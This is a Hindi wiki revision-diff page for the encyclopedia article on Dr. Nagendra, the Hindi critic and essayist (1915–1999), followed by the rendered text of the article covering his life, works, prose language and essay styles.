डॉ. नगेन्द्र: Difference between revisions
[unchecked revision] | [unchecked revision] |
व्यवस्थापन (talk | contribs) m (Text replacement - "विद्वान " to "विद्वान् ") |
No edit summary |
||
(3 intermediate revisions by 2 users not shown) | |||
Line 1: | Line 1: | ||
{{सूचना बक्सा साहित्यकार | {{सूचना बक्सा साहित्यकार | ||
|चित्र= | |चित्र=Dr-Nagendra.jpg | ||
|चित्र का नाम= | |चित्र का नाम= | ||
|पूरा नाम=डॉ. नगेन्द्र | |पूरा नाम=डॉ. नगेन्द्र | ||
Line 12: | Line 12: | ||
|पति/पत्नी= | |पति/पत्नी= | ||
|संतान= | |संतान= | ||
|कर्म भूमि= | |कर्म भूमि=[[भारत]] | ||
|कर्म-क्षेत्र=लेखक, कवि, निबन्धकार, आलोचक, प्राध्यापक | |कर्म-क्षेत्र=लेखक, [[कवि]], निबन्धकार, आलोचक, प्राध्यापक | ||
|मुख्य रचनाएँ='विचार और विवेचन' (1944), 'विचार और अनुभूति' (1949), 'विचार और विश्लेषण' (1955), 'अरस्तू का काव्यशास्त्र' (1957), 'अनुसंधान और आलोचना' (1961), 'रस-सिद्धांत (1964), 'आलोचक की आस्था' (1966), 'समस्या और समाधान' (1971) | |मुख्य रचनाएँ='विचार और विवेचन' ([[1944]]), 'विचार और अनुभूति' ([[1949]]), 'विचार और विश्लेषण' ([[1955]]), 'अरस्तू का काव्यशास्त्र' ([[1957]]), 'अनुसंधान और आलोचना' ([[1961]]), 'रस-सिद्धांत ([[1964]]), 'आलोचक की आस्था' ([[1966]]), 'समस्या और समाधान' ([[1971]]), [[भारतीय साहित्य -नगेन्द्र|भारतीय साहित्य]], [[भारतीय महाकाव्य -नगेन्द्र|भारतीय महाकाव्य]] आदि। | ||
|विषय= | |विषय= | ||
|भाषा=[[हिंदी]], [[खड़ी बोली]] एवं [[अंग्रेज़ी]] | |भाषा=[[हिंदी]], [[खड़ी बोली]] एवं [[अंग्रेज़ी]] | ||
|विद्यालय= | |विद्यालय= | ||
|शिक्षा=एम. ए. (हिंदी एवं अंग्रेज़ी), डी. लिट. (हिंदी) | |शिक्षा=एम. ए. (हिंदी एवं अंग्रेज़ी), डी. लिट. (हिंदी) | ||
|पुरस्कार-उपाधि=[[साहित्य अकादमी पुरस्कार हिन्दी|साहित्य अकादमी पुरस्कार]] ('रस-सिद्धांत' के लिए 1965 में) | |पुरस्कार-उपाधि=[[साहित्य अकादमी पुरस्कार हिन्दी|साहित्य अकादमी पुरस्कार]] ('रस-सिद्धांत' के लिए [[1965]] में) | ||
|प्रसिद्धि= | |प्रसिद्धि= | ||
|विशेष योगदान= | |विशेष योगदान= | ||
Line 31: | Line 31: | ||
|बाहरी कड़ियाँ= | |बाहरी कड़ियाँ= | ||
|अद्यतन= | |अद्यतन= | ||
}} | }}'''डॉ. नगेन्द्र''' ([[अंग्रेज़ी]]: ''Dr. Nagendra'', जन्म- [[9 मार्च]], [[1915]], [[अलीगढ़]], [[उत्तर प्रदेश]]; मृत्यु- [[27 अक्टूबर]], [[1999]], [[नई दिल्ली]]) [[भारत]] के प्रसिद्ध [[हिंदी]] साहित्यकार थे। आधुनिक [[हिन्दी]] की [[आलोचना (साहित्य)|आलोचना]] को समृद्ध करने में डॉ. नगेन्द्र का महत्वपूर्ण योगदान रहा था। वे [[काव्य]] शास्त्र के प्रकाण्ड विद्वान् माने जाते थे। उनके [[निबन्ध|निबन्धों]] में वैचारिक औदात्य के साथ-साथ उनका व्यक्तित्व भी अभिव्यक्ति पा गया है। उनके निबन्धों में एक सहृदय तथा भावुक निबन्धकार के गुण भली-भाँति लक्षित होते हैं। इसका कारण यह है कि नगेन्द्र जी का [[हिन्दी साहित्य]] के क्षेत्र में प्रवेश एक [[कवि]] के रूप में हुआ था। उनकी प्रतिभा का विकास मूलतः आलोचनात्मक निबन्धकार के रूप में ही हुआ। [[हिन्दी]] के पांक्तेय आलोचक के रूप में नगेन्द्र विशेषतः यशस्वी रहे हैं। | ||
'''डॉ. नगेन्द्र''' ([[अंग्रेज़ी]]: ''Dr. Nagendra'', जन्म- [[9 मार्च]], [[1915]], [[अलीगढ़]], [[उत्तर प्रदेश]]; मृत्यु- [[27 अक्टूबर]], [[1999]], [[नई दिल्ली]]) [[भारत]] के प्रसिद्ध [[हिंदी]] साहित्यकार थे। आधुनिक [[हिन्दी]] की [[आलोचना (साहित्य)|आलोचना]] को समृद्ध करने में डॉ. नगेन्द्र का महत्वपूर्ण योगदान रहा था। वे [[काव्य]] शास्त्र के प्रकाण्ड विद्वान् माने जाते थे। उनके [[निबन्ध|निबन्धों]] में वैचारिक औदात्य के साथ-साथ उनका व्यक्तित्व भी अभिव्यक्ति पा गया है। उनके निबन्धों में एक सहृदय तथा भावुक निबन्धकार के गुण भली-भाँति लक्षित होते हैं। इसका कारण यह है कि नगेन्द्र जी का [[हिन्दी साहित्य]] के क्षेत्र में प्रवेश एक [[कवि]] के रूप में हुआ था। उनकी प्रतिभा का विकास मूलतः आलोचनात्मक निबन्धकार के रूप में ही हुआ। [[हिन्दी]] के पांक्तेय आलोचक के रूप में नगेन्द्र विशेषतः यशस्वी रहे हैं। | |||
==परिचय== | ==परिचय== | ||
डॉ. नगेन्द्र का जन्म 9 मार्च, 1915 को उत्तर प्रदेश के [[अलीगढ़ ज़िला|अलीगढ़ ज़िले]] में अतरौली नामक कस्बे में हुआ था। अपनी शिक्षा के अंतर्गत नगेन्द्र जी ने अंग्रेज़ी और हिन्दी विषयों में एम. ए. किया था। इसके बाद उन्होंने हिन्दी में डी. लिट. की उपाधि भी प्राप्त की थी। नगेन्द्र जी '[[दिल्ली विश्वविद्यालय]]' से प्रोफ़ेसर तथा [[हिन्दी]] विभागाध्यक्ष के पद पर से सेवानिवृत्त होने के उपरान्त स्वतन्त्र रूप से [[साहित्य]] की साधना में संलग्न हो गये थे। उन्होंने 'एमरिट्स प्रोफ़ेसर' के पद पर भी कार्य किया था। वह 'आगरा विश्वविद्यालय'<ref>अब 'भीमराव अम्बेडकर विश्वविद्यालय'</ref>, [[आगरा]] से "रीतिकाल के संदर्भ में देव का अध्ययन" शीर्षक शोध प्रबन्ध पर शोध उपाधि से अलंकृत हुए थे। भारत के विभिन्न विश्वविद्यालयों में डॉ. नगेन्द्र को प्राध्यापक, रीडर एवं प्रोफ़ेसर के पदों पर नियुक्ति के समय विशेषज्ञ नियुक्त किया जाता था।<ref name="ab">{{cite web |url=http://vangmaypatrika.blogspot.in/2008/03/blog-post_8515.html|title=यशस्वी शैलीकार डॉक्टर नगेन्द्र|accessmonthday=6 फ़रवरी|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> | डॉ. नगेन्द्र का जन्म 9 मार्च, 1915 को [[उत्तर प्रदेश]] के [[अलीगढ़ ज़िला|अलीगढ़ ज़िले]] में अतरौली नामक कस्बे में हुआ था। अपनी शिक्षा के अंतर्गत नगेन्द्र जी ने अंग्रेज़ी और हिन्दी विषयों में एम. ए. किया था। इसके बाद उन्होंने हिन्दी में डी. लिट. की उपाधि भी प्राप्त की थी। नगेन्द्र जी '[[दिल्ली विश्वविद्यालय]]' से प्रोफ़ेसर तथा [[हिन्दी]] विभागाध्यक्ष के पद पर से सेवानिवृत्त होने के उपरान्त स्वतन्त्र रूप से [[साहित्य]] की साधना में संलग्न हो गये थे। उन्होंने 'एमरिट्स प्रोफ़ेसर' के पद पर भी कार्य किया था। वह 'आगरा विश्वविद्यालय'<ref>अब 'भीमराव अम्बेडकर विश्वविद्यालय'</ref>, [[आगरा]] से "रीतिकाल के संदर्भ में देव का अध्ययन" शीर्षक शोध प्रबन्ध पर शोध उपाधि से अलंकृत हुए थे। भारत के विभिन्न विश्वविद्यालयों में डॉ. नगेन्द्र को प्राध्यापक, रीडर एवं प्रोफ़ेसर के पदों पर नियुक्ति के समय विशेषज्ञ नियुक्त किया जाता था।<ref name="ab">{{cite web |url=http://vangmaypatrika.blogspot.in/2008/03/blog-post_8515.html|title=यशस्वी शैलीकार डॉक्टर नगेन्द्र|accessmonthday=6 फ़रवरी|accessyear=2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> | ||
==लेखन कार्य== | ==लेखन कार्य== | ||
नगेन्द्र जी ने अपनी प्रखर कलम के द्वारा हिन्दी निबन्ध साहित्य की गरिमा को अद्वितीय बनाने में महत्त्वपूर्ण भूमिका निर्वाहित की। उनके द्वारा कृत 'मेरा व्यवसाय' और 'साहित्य सृजन' शीर्षक इस [[निबन्ध]] लेखक की आत्मपरक शैली का प्रतीक है। इस रचना में नगेन्द्र जी ने अपने आपको अपनी ही दृष्टि से देखा तथा परखा है। यह निबन्ध अध्यापकों-अध्यापिकाओं के लिये विशेषतः उपादेय है। डॉ. नगेन्द्र का यह मानना था कि "अध्यापक वृत्तितः व्याख्याता और विवेकशील होता है। ऊँची श्रेणी के विद्यार्थियों और अनुसन्धाताओं को काव्य का मर्म समझाना उसका व्यावसायिक कर्तव्य व कर्म है।" उन्होंने यह भी लिखा है कि "अध्यापन का, विशेषकर उच्च स्तर के अध्यापन का, साहित्य के अन्य अंगों के सृजन से सहज सम्बन्ध न हो, परन्तु [[आलोचना (साहित्य)|आलोचना]] से उसका प्रत्यक्ष सम्बन्ध है।" कक्षा के मंच पर अध्यापक किसी साहित्यिक समस्या को लेकर स्वयं निर्णय ले सके तथा शिक्षार्थी वर्ग की निर्णय शक्ति का विकास कर सके। यह निश्चय ही अध्यापक के धर्म की परिधि कहलाती है। | नगेन्द्र जी ने अपनी प्रखर कलम के द्वारा हिन्दी निबन्ध साहित्य की गरिमा को अद्वितीय बनाने में महत्त्वपूर्ण भूमिका निर्वाहित की। उनके द्वारा कृत 'मेरा व्यवसाय' और 'साहित्य सृजन' शीर्षक इस [[निबन्ध]] लेखक की आत्मपरक शैली का प्रतीक है। इस रचना में नगेन्द्र जी ने अपने आपको अपनी ही दृष्टि से देखा तथा परखा है। यह निबन्ध अध्यापकों-अध्यापिकाओं के लिये विशेषतः उपादेय है। डॉ. नगेन्द्र का यह मानना था कि "अध्यापक वृत्तितः व्याख्याता और विवेकशील होता है। ऊँची श्रेणी के विद्यार्थियों और अनुसन्धाताओं को काव्य का मर्म समझाना उसका व्यावसायिक कर्तव्य व कर्म है।" उन्होंने यह भी लिखा है कि "अध्यापन का, विशेषकर उच्च स्तर के अध्यापन का, साहित्य के अन्य अंगों के सृजन से सहज सम्बन्ध न हो, परन्तु [[आलोचना (साहित्य)|आलोचना]] से उसका प्रत्यक्ष सम्बन्ध है।" कक्षा के मंच पर अध्यापक किसी साहित्यिक समस्या को लेकर स्वयं निर्णय ले सके तथा शिक्षार्थी वर्ग की निर्णय शक्ति का विकास कर सके। यह निश्चय ही अध्यापक के धर्म की परिधि कहलाती है। | ||
====भाषा==== | ====भाषा==== | ||
डॉ. नगेन्द्र के निबन्धों की [[भाषा]] शुद्ध, परिष्कृत, परिमार्जित, [[व्याकरण]] सम्मत तथा साहित्यिक [[खड़ी बोली]] है। गद्य भाषा की प्रमुख विशेषता यह है कि वह विषयानुरूप अपना स्वरूप बदलती चलती है। निबन्धों में सर्वत्र भाषा का रूप साफ सुथरा, शिष्ट, मधुर एवं समर्थ लक्षित होता है। भारत भूषण अग्रवाल ने 'नये शब्दों के निर्माण की दृष्टि से डॉ. नगेन्द्र का अवदान सर्वोपरि माना है। | डॉ. नगेन्द्र के [[निबन्ध|निबन्धों]] की [[भाषा]] शुद्ध, परिष्कृत, परिमार्जित, [[व्याकरण]] सम्मत तथा साहित्यिक [[खड़ी बोली]] है। गद्य भाषा की प्रमुख विशेषता यह है कि वह विषयानुरूप अपना स्वरूप बदलती चलती है। निबन्धों में सर्वत्र भाषा का रूप साफ सुथरा, शिष्ट, मधुर एवं समर्थ लक्षित होता है। भारत भूषण अग्रवाल ने 'नये शब्दों के निर्माण की दृष्टि से डॉ. नगेन्द्र का अवदान सर्वोपरि माना है। नगेन्द्र जी सामान्यतः गम्भीर तथा चिन्तन-प्रधान निबन्धकार के रूप में जाने जाते हैं। साहित्यिक आलोचनात्मक निबन्ध लेखन के आधार पर उन्होंने साहित्य की प्रभूत सेवाएँ की हैं। उनके निबन्धों में विचार-गाम्भीर्य, चिन्तन की मौलिकता तथा शैली की रोचकता का सहज समन्वय लक्षित होता है।<ref name="ab"/> | ||
नगेन्द्र जी सामान्यतः गम्भीर तथा चिन्तन-प्रधान निबन्धकार के रूप में जाने जाते हैं। साहित्यिक आलोचनात्मक निबन्ध लेखन के आधार पर उन्होंने साहित्य की प्रभूत सेवाएँ की हैं। उनके निबन्धों में विचार-गाम्भीर्य, चिन्तन की मौलिकता तथा शैली की रोचकता का सहज समन्वय लक्षित होता है।<ref name="ab"/> | |||
==शैली== | ==शैली== | ||
डॉ. नगेन्द्र की [[निबन्ध]] लेखन की शैली में भावों एवं विचारों को अभिव्यक्ति प्रदान करने की अद्भुत क्षमता लक्षित होती है। उनकी लेखन शैली [[अंग्रेज़ी साहित्य]] से प्रभावित रही है। इसका कारण यह है कि वह अंग्रेज़ी साहित्य से सम्पूर्णतः प्रभावित और प्रेरित होकर [[हिन्दी साहित्य]] की साधना के मार्ग पर चले थे। उनके 'निबन्ध साहित्य' में निम्नलिखित शैलियों का व्यवहार सम्यक रूपेण लक्षित होता है- | डॉ. नगेन्द्र की [[निबन्ध]] लेखन की शैली में भावों एवं विचारों को अभिव्यक्ति प्रदान करने की अद्भुत क्षमता लक्षित होती है। उनकी लेखन शैली [[अंग्रेज़ी साहित्य]] से प्रभावित रही है। इसका कारण यह है कि वह [[अंग्रेज़ी साहित्य]] से सम्पूर्णतः प्रभावित और प्रेरित होकर [[हिन्दी साहित्य]] की साधना के मार्ग पर चले थे। उनके 'निबन्ध साहित्य' में निम्नलिखित शैलियों का व्यवहार सम्यक रूपेण लक्षित होता है- | ||
*'''विवेचनात्मक शैली''' - नगेन्द्र जी मूलतः आलोचनात्मक एवं विचारात्मक निबन्धकार के रूप में समादृत रहे थे। इस शैली में लेखक तर्कों द्वारा युक्तियों को सुलझाता हुआ चलता है। वह अत्यन्त गम्भीर एवं बौद्धिक विषय को अपनी कुशल विवेचना पद्धति के द्वारा सरल रूप में स्पष्ट कर देता है तथा विवादास्पद विषयों को अत्यन्त बोधगम्य रीति से समझाने की चेष्टा करता है। उनका 'आस्था के चरण' शीर्षक निबन्ध संकलन इस शैली का अच्छा उदाहरण है। | *'''विवेचनात्मक शैली''' - नगेन्द्र जी मूलतः आलोचनात्मक एवं विचारात्मक निबन्धकार के रूप में समादृत रहे थे। इस शैली में लेखक तर्कों द्वारा युक्तियों को सुलझाता हुआ चलता है। वह अत्यन्त गम्भीर एवं बौद्धिक विषय को अपनी कुशल विवेचना पद्धति के द्वारा सरल रूप में स्पष्ट कर देता है तथा विवादास्पद विषयों को अत्यन्त बोधगम्य रीति से समझाने की चेष्टा करता है। उनका 'आस्था के चरण' शीर्षक निबन्ध संकलन इस शैली का अच्छा उदाहरण है। | ||
*'''प्रसादात्मक शैली''' - इस शैली का प्रयोग डॉ. नगेन्द्र के निबन्ध साहित्य में सर्वत्र देखा जा सकता है। इस शैली के द्वारा लेखक ने विषय को सरल तथा बोधगम्य रीति से प्रस्तुत करने का कार्य किया है। यह भी एक तथ्य है कि कि डॉ. नगेन्द्र का मन सम्पूर्णतः प्राध्यापन व्यवसाय में ही रमण करता रहा। इसीलिए लिखते समय वह इस बात का ध्यान रखते थे कि जो बात वह कह रहे हैं, उसमें कहीं किसी प्रकार की अस्पष्टता न रह जाए।<ref name="ab"/> | *'''प्रसादात्मक शैली''' - इस [[शैली]] का प्रयोग डॉ. नगेन्द्र के निबन्ध साहित्य में सर्वत्र देखा जा सकता है। इस शैली के द्वारा लेखक ने विषय को सरल तथा बोधगम्य रीति से प्रस्तुत करने का कार्य किया है। यह भी एक तथ्य है कि कि डॉ. नगेन्द्र का मन सम्पूर्णतः प्राध्यापन व्यवसाय में ही रमण करता रहा। इसीलिए लिखते समय वह इस बात का ध्यान रखते थे कि जो बात वह कह रहे हैं, उसमें कहीं किसी प्रकार की अस्पष्टता न रह जाए।<ref name="ab"/> | ||
*'''गोष्ठी शैली''' - 'हिन्दी उपन्यास' नामक निबन्ध में नगेन्द्र जी ने "गोष्ठी शैली" का व्यवहार किया है। सही अर्थों में वे अपनी प्रतिभा के बल पर ही निबन्ध साहित्य में 'गोष्ठी शैली' की सृष्टि करने में सफल रहे थे। | *'''गोष्ठी शैली''' - 'हिन्दी उपन्यास' नामक [[निबन्ध]] में नगेन्द्र जी ने "गोष्ठी शैली" का व्यवहार किया है। सही अर्थों में वे अपनी प्रतिभा के बल पर ही निबन्ध साहित्य में 'गोष्ठी शैली' की सृष्टि करने में सफल रहे थे। | ||
*'''सम्वादात्मक शैली''' - 'हिन्दी साहित्य में हास्य की कमी' शीर्षक रचना में इस शैली का प्रयोग देखा जा सकता है। इस शैली में जागरुक अध्येताओं को स्पष्टता एवं विवेचना दोनों ही बातें लक्षित हो जाएंगी। | *'''सम्वादात्मक शैली''' - 'हिन्दी साहित्य में हास्य की कमी' शीर्षक रचना में इस शैली का प्रयोग देखा जा सकता है। इस शैली में जागरुक अध्येताओं को स्पष्टता एवं विवेचना दोनों ही बातें लक्षित हो जाएंगी। | ||
*'''पत्रात्मक शैली''' - 'केशव का आचार्यत्व' नामक रचना में डॉ. नगेन्द्र ने पत्रात्मक शैली का प्रयोग किया गया है। उल्लेखनीय बात तो यह है कि डॉ. विजयेन्द्र स्नातक कृत 'अनुभूति के क्षण' नामक रचना भी सम्पूर्णतः पत्रात्मक शैली की ही निबन्ध रचना है। | *'''पत्रात्मक शैली''' - 'केशव का आचार्यत्व' नामक रचना में डॉ. नगेन्द्र ने पत्रात्मक शैली का प्रयोग किया गया है। उल्लेखनीय बात तो यह है कि डॉ. विजयेन्द्र स्नातक कृत 'अनुभूति के क्षण' नामक रचना भी सम्पूर्णतः पत्रात्मक शैली की ही निबन्ध रचना है। | ||
*'''प्रश्नोत्तर शैली''' - डॉ. नगेन्द्र के लेखन में 'प्रश्नोत्तर शैली' का सौन्दर्य भी लक्षित हो जाता है। इस शैली में निबन्धकार स्वयं ही प्रश्न करता है तथा उसका उत्तर भी स्वयं ही देता है। डॉ. नगेन्द्र कृत 'साहित्य की समीक्षा' शीर्षक [[निबन्ध]] को इस शैली का अन्यतम उदाहरण माना जा सकता है। | *'''प्रश्नोत्तर शैली''' - डॉ. नगेन्द्र के लेखन में 'प्रश्नोत्तर शैली' का सौन्दर्य भी लक्षित हो जाता है। इस शैली में निबन्धकार स्वयं ही प्रश्न करता है तथा उसका उत्तर भी स्वयं ही देता है। डॉ. नगेन्द्र कृत 'साहित्य की समीक्षा' शीर्षक [[निबन्ध]] को इस शैली का अन्यतम उदाहरण माना जा सकता है। | ||
*'''संस्मरणात्मक शैली''' - 'अप्रवासी की यात्राएँ' नामक कृति 'यात्रावृत्त' की विधा की एक प्रमुख कृति है। यह रचना डॉ. नगेन्द्र की संस्मरणात्मक शैली के सौन्दर्य का उदाहरण प्रस्तुत करती है। 'दद्दा- एक महान् व्यक्तित्व' शीर्षक संस्मरणात्मक निबन्ध में इस शैली का व्यवहार लक्षित होता है। | *'''संस्मरणात्मक शैली''' - 'अप्रवासी की यात्राएँ' नामक कृति 'यात्रावृत्त' की विधा की एक प्रमुख कृति है। यह रचना डॉ. नगेन्द्र की संस्मरणात्मक शैली के सौन्दर्य का उदाहरण प्रस्तुत करती है। 'दद्दा- एक महान् व्यक्तित्व' शीर्षक संस्मरणात्मक निबन्ध में इस शैली का व्यवहार लक्षित होता है। | ||
*'''आत्मसाक्षात्कार की शैली''' - 'आलोचक का आत्म विश्लेषण' नामक रचना में डॉ. नगेन्द्र का लेख इस शैली का प्रयोग करता हुआ लक्षित होता है। वस्तुतः निबन्ध की विधा में वे ऐसे शैलीकार के रूप में सामने आते हैं, जो रचना में आद्योपान्त अपनी रचना प्रक्रिया पर प्रकाश डालते हुए चलता है।<ref name="ab"/> | *'''आत्मसाक्षात्कार की शैली''' - 'आलोचक का आत्म विश्लेषण' नामक रचना में डॉ. नगेन्द्र का लेख इस शैली का प्रयोग करता हुआ लक्षित होता है। वस्तुतः [[निबन्ध]] की विधा में वे ऐसे शैलीकार के रूप में सामने आते हैं, जो रचना में आद्योपान्त अपनी रचना प्रक्रिया पर प्रकाश डालते हुए चलता है।<ref name="ab"/> | ||
{| width="70%" class="bharattable-pink" | {| width="70%" class="bharattable-pink" | ||
|+डॉ. नगेन्द्र की मुख्य रचनाएँ | |+डॉ. नगेन्द्र की मुख्य रचनाएँ | ||
Line 91: | Line 89: | ||
==निधन== | ==निधन== | ||
[[हिन्दी साहित्य]] में अपना विशिष्ट योगदान करने वाले साहित्यकार डॉ. नगेन्द्र का निधन [[27 अक्टूबर]], [[1999]] को [[नई दिल्ली]] में हुआ। | [[हिन्दी साहित्य]] में अपना विशिष्ट योगदान करने वाले साहित्यकार डॉ. नगेन्द्र का निधन [[27 अक्टूबर]], [[1999]] को [[नई दिल्ली]] में हुआ। | ||
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक= |पूर्णता= |शोध= }} | {{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक= |पूर्णता= |शोध= }} | ||
Line 101: | Line 100: | ||
[[Category:साहित्यकार]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:कवि]][[Category:साहित्य कोश]][[Category:जीवनी साहित्य]][[Category:चरित कोश]] | [[Category:साहित्यकार]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:कवि]][[Category:साहित्य कोश]][[Category:जीवनी साहित्य]][[Category:चरित कोश]] | ||
__INDEX__ | __INDEX__ | ||
Latest revision as of 07:02, 14 March 2022
डॉ. नगेन्द्र
| |
पूरा नाम | डॉ. नगेन्द्र |
जन्म | 9 मार्च, 1915 |
जन्म भूमि | अलीगढ़, उत्तर प्रदेश |
मृत्यु | 27 अक्टूबर, 1999 |
मृत्यु स्थान | नई दिल्ली |
कर्म भूमि | भारत |
कर्म-क्षेत्र | लेखक, कवि, निबन्धकार, आलोचक, प्राध्यापक |
मुख्य रचनाएँ | 'विचार और विवेचन' (1944), 'विचार और अनुभूति' (1949), 'विचार और विश्लेषण' (1955), 'अरस्तू का काव्यशास्त्र' (1957), 'अनुसंधान और आलोचना' (1961), 'रस-सिद्धांत (1964), 'आलोचक की आस्था' (1966), 'समस्या और समाधान' (1971), भारतीय साहित्य, भारतीय महाकाव्य आदि। |
भाषा | हिंदी, खड़ी बोली एवं अंग्रेज़ी |
शिक्षा | एम. ए. (हिंदी एवं अंग्रेज़ी), डी. लिट. (हिंदी) |
पुरस्कार-उपाधि | साहित्य अकादमी पुरस्कार ('रस-सिद्धांत' के लिए 1965 में) |
नागरिकता | भारतीय |
अन्य जानकारी | आधुनिक हिन्दी की आलोचना को समृद्ध करने में डॉ. नगेन्द्र का महत्वपूर्ण योगदान रहा था। |
इन्हें भी देखें | कवि सूची, साहित्यकार सूची |
डॉ. नगेन्द्र (अंग्रेज़ी: Dr. Nagendra, जन्म- 9 मार्च, 1915, अलीगढ़, उत्तर प्रदेश; मृत्यु- 27 अक्टूबर, 1999, नई दिल्ली) भारत के प्रसिद्ध हिंदी साहित्यकार थे। आधुनिक हिन्दी की आलोचना को समृद्ध करने में डॉ. नगेन्द्र का महत्वपूर्ण योगदान रहा था। वे काव्य शास्त्र के प्रकाण्ड विद्वान् माने जाते थे। उनके निबन्धों में वैचारिक औदात्य के साथ-साथ उनका व्यक्तित्व भी अभिव्यक्ति पा गया है। उनके निबन्धों में एक सहृदय तथा भावुक निबन्धकार के गुण भली-भाँति लक्षित होते हैं। इसका कारण यह है कि नगेन्द्र जी का हिन्दी साहित्य के क्षेत्र में प्रवेश एक कवि के रूप में हुआ था। उनकी प्रतिभा का विकास मूलतः आलोचनात्मक निबन्धकार के रूप में ही हुआ। हिन्दी के पांक्तेय आलोचक के रूप में नगेन्द्र विशेषतः यशस्वी रहे हैं।
परिचय
डॉ. नगेन्द्र का जन्म 9 मार्च, 1915 को उत्तर प्रदेश के अलीगढ़ ज़िले में अतरौली नामक कस्बे में हुआ था। अपनी शिक्षा के अंतर्गत नगेन्द्र जी ने अंग्रेज़ी और हिन्दी विषयों में एम. ए. किया था। इसके बाद उन्होंने हिन्दी में डी. लिट. की उपाधि भी प्राप्त की थी। नगेन्द्र जी 'दिल्ली विश्वविद्यालय' से प्रोफ़ेसर तथा हिन्दी विभागाध्यक्ष के पद पर से सेवानिवृत्त होने के उपरान्त स्वतन्त्र रूप से साहित्य की साधना में संलग्न हो गये थे। उन्होंने 'एमरिट्स प्रोफ़ेसर' के पद पर भी कार्य किया था। वह 'आगरा विश्वविद्यालय'[1], आगरा से "रीतिकाल के संदर्भ में देव का अध्ययन" शीर्षक शोध प्रबन्ध पर शोध उपाधि से अलंकृत हुए थे। भारत के विभिन्न विश्वविद्यालयों में डॉ. नगेन्द्र को प्राध्यापक, रीडर एवं प्रोफ़ेसर के पदों पर नियुक्ति के समय विशेषज्ञ नियुक्त किया जाता था।[2]
लेखन कार्य
नगेन्द्र जी ने अपनी प्रखर कलम के द्वारा हिन्दी निबन्ध साहित्य की गरिमा को अद्वितीय बनाने में महत्त्वपूर्ण भूमिका निर्वाहित की। उनके द्वारा कृत 'मेरा व्यवसाय' और 'साहित्य सृजन' शीर्षक इस निबन्ध लेखक की आत्मपरक शैली का प्रतीक है। इस रचना में नगेन्द्र जी ने अपने आपको अपनी ही दृष्टि से देखा तथा परखा है। यह निबन्ध अध्यापकों-अध्यापिकाओं के लिये विशेषतः उपादेय है। डॉ. नगेन्द्र का यह मानना था कि "अध्यापक वृत्तितः व्याख्याता और विवेकशील होता है। ऊँची श्रेणी के विद्यार्थियों और अनुसन्धाताओं को काव्य का मर्म समझाना उसका व्यावसायिक कर्तव्य व कर्म है।" उन्होंने यह भी लिखा है कि "अध्यापन का, विशेषकर उच्च स्तर के अध्यापन का, साहित्य के अन्य अंगों के सृजन से सहज सम्बन्ध न हो, परन्तु आलोचना से उसका प्रत्यक्ष सम्बन्ध है।" कक्षा के मंच पर अध्यापक किसी साहित्यिक समस्या को लेकर स्वयं निर्णय ले सके तथा शिक्षार्थी वर्ग की निर्णय शक्ति का विकास कर सके। यह निश्चय ही अध्यापक के धर्म की परिधि कहलाती है।
भाषा
डॉ. नगेन्द्र के निबन्धों की भाषा शुद्ध, परिष्कृत, परिमार्जित, व्याकरण सम्मत तथा साहित्यिक खड़ी बोली है। गद्य भाषा की प्रमुख विशेषता यह है कि वह विषयानुरूप अपना स्वरूप बदलती चलती है। निबन्धों में सर्वत्र भाषा का रूप साफ सुथरा, शिष्ट, मधुर एवं समर्थ लक्षित होता है। भारत भूषण अग्रवाल ने 'नये शब्दों के निर्माण की दृष्टि से डॉ. नगेन्द्र का अवदान सर्वोपरि माना है। नगेन्द्र जी सामान्यतः गम्भीर तथा चिन्तन-प्रधान निबन्धकार के रूप में जाने जाते हैं। साहित्यिक आलोचनात्मक निबन्ध लेखन के आधार पर उन्होंने साहित्य की प्रभूत सेवाएँ की हैं। उनके निबन्धों में विचार-गाम्भीर्य, चिन्तन की मौलिकता तथा शैली की रोचकता का सहज समन्वय लक्षित होता है।[2]
शैली
डॉ. नगेन्द्र की निबन्ध लेखन की शैली में भावों एवं विचारों को अभिव्यक्ति प्रदान करने की अद्भुत क्षमता लक्षित होती है। उनकी लेखन शैली अंग्रेज़ी साहित्य से प्रभावित रही है। इसका कारण यह है कि वह अंग्रेज़ी साहित्य से सम्पूर्णतः प्रभावित और प्रेरित होकर हिन्दी साहित्य की साधना के मार्ग पर चले थे। उनके 'निबन्ध साहित्य' में निम्नलिखित शैलियों का व्यवहार सम्यक रूपेण लक्षित होता है-
- विवेचनात्मक शैली - नगेन्द्र जी मूलतः आलोचनात्मक एवं विचारात्मक निबन्धकार के रूप में समादृत रहे थे। इस शैली में लेखक तर्कों द्वारा युक्तियों को सुलझाता हुआ चलता है। वह अत्यन्त गम्भीर एवं बौद्धिक विषय को अपनी कुशल विवेचना पद्धति के द्वारा सरल रूप में स्पष्ट कर देता है तथा विवादास्पद विषयों को अत्यन्त बोधगम्य रीति से समझाने की चेष्टा करता है। उनका 'आस्था के चरण' शीर्षक निबन्ध संकलन इस शैली का अच्छा उदाहरण है।
- प्रसादात्मक शैली - इस शैली का प्रयोग डॉ. नगेन्द्र के निबन्ध साहित्य में सर्वत्र देखा जा सकता है। इस शैली के द्वारा लेखक ने विषय को सरल तथा बोधगम्य रीति से प्रस्तुत करने का कार्य किया है। यह भी एक तथ्य है कि कि डॉ. नगेन्द्र का मन सम्पूर्णतः प्राध्यापन व्यवसाय में ही रमण करता रहा। इसीलिए लिखते समय वह इस बात का ध्यान रखते थे कि जो बात वह कह रहे हैं, उसमें कहीं किसी प्रकार की अस्पष्टता न रह जाए।[2]
- गोष्ठी शैली - 'हिन्दी उपन्यास' नामक निबन्ध में नगेन्द्र जी ने "गोष्ठी शैली" का व्यवहार किया है। सही अर्थों में वे अपनी प्रतिभा के बल पर ही निबन्ध साहित्य में 'गोष्ठी शैली' की सृष्टि करने में सफल रहे थे।
- सम्वादात्मक शैली - 'हिन्दी साहित्य में हास्य की कमी' शीर्षक रचना में इस शैली का प्रयोग देखा जा सकता है। इस शैली में जागरुक अध्येताओं को स्पष्टता एवं विवेचना दोनों ही बातें लक्षित हो जाएंगी।
